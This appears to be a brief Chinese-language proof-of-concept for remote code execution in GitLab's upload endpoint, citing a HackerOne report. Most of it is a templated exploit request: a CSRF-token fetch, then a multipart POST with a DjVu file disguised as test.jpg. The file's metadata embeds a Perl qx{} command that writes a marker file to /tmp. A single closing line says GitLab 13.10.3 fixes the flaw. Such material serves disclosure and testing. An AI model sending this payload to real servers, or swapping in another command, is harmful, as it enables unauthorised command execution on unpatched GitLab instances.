参考: https://hackerone.com/reports/1154542
获取X-CSRF-Token
代码语言:javascript复制GET /users/sign_in
RCE
代码语言:javascript复制POST /uploads/user
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
AT&TFORM 疍JVMDIRM .? F ?蘅?!葢N?亿堣k鍰,q領觧暯⒚"?FORM ^DJVUINFO
d INCL shared_anno.iff BG44 J 婃岜7?*? BG44 鶡BG44
FORM DJVIANTa P(metadata
(Copyright "
" . qx{echo vakzz >/tmp/vakzz} .
" b ") )修复建议:
GitLab 版本 13.10.3已修复更新
